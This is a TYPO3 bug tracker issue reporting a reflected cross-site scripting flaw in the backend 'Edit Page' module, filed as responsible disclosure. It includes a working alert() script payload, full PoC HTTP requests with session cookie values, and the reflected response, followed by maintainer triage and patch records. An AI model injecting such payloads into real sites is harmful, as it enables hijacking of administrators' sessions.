Project

General

Profile

Actions

Bug #82077

closed

XSS in page module

Added by Oliver Hader over 6 years ago. Updated over 5 years ago.

Status:
Closed
Priority:
Should have
Assignee:
-
Category:
-
Target version:
-
Start date:
2017-08-10
Due date:
% Done:

100%

Estimated time:
TYPO3 Version:
6.2
PHP Version:
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

For the attention of the TYPO3 security team,

I would like to inform you about a security issue that I have found on the cms TYPO3 (checked on versions 8.7.3 and 6.2.30).

Specifically that versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for the pages which are configured to show the content from other pages.

Technical Details =================
Below is descripted the scenario to reproduce the security issue.

Prerequisite - Configure a page to show content from another page: in the home Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to the "Edit Page". After select the "Appaerance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page and finally save it.

At this point in the "Edit Page" area for the aforementioned page will appear a blue rectangle with inside a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.

Proof of Concept:
To replicate the issue is sufficient to click the aforementioned new link (for the 8.7.3 it have the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").

And so grab the GET request which is being passed to the server and add the payload in the URL query, so the submitted payload is reflected on the correspondent response body.

EXAMPLE (attached there is a screenshot of the PoC)
Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

ORIGINAL REQUEST:
--------------------------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT

PoC REQUEST:
------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

PoC RESPONSE:
-------------
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2017 08:15:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41399

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body">
Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a>
</div></div></div></div>
[...]

Vulnerable Versions:
TYPO3 8.7.3 and earlier

Checked on:
TYPO3/8.7.3
TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")

Actions #1

Updated by Oliver Hader over 6 years ago

  • Category set to OW-A07: Cross Site Scripting
Actions #2

Updated by Gerrit Code Review over 6 years ago

  • Status changed from New to Under Review

Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53700

Actions #3

Updated by Helmut Hummel over 6 years ago

  • Project changed from 1716 to TYPO3 Core
  • Category deleted (OW-A07: Cross Site Scripting)

This is reflected(non persitent) XSS, which means, to exploit this, you need to trick others to follow the link.
However in this case the link contains a CSRF token, which cannot be known by the attacker.

While this is a valid bug, which needs to be fixed, it is not reasonably exploitable. We can therefore fix this within our public bug fixing process

Actions #4

Updated by Gerrit Code Review over 6 years ago

Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53719

Actions #5

Updated by Gerrit Code Review over 6 years ago

Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53733

Actions #6

Updated by Wouter Wolters over 6 years ago

  • Status changed from Under Review to Resolved
  • % Done changed from 0 to 100
Actions #7

Updated by Gerrit Code Review over 6 years ago

  • Status changed from Resolved to Under Review

Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53734

Actions #8

Updated by Wouter Wolters over 6 years ago

  • Status changed from Under Review to Resolved
Actions #9

Updated by Benni Mack over 5 years ago

  • Status changed from Resolved to Closed
Actions

Also available in: Atom PDF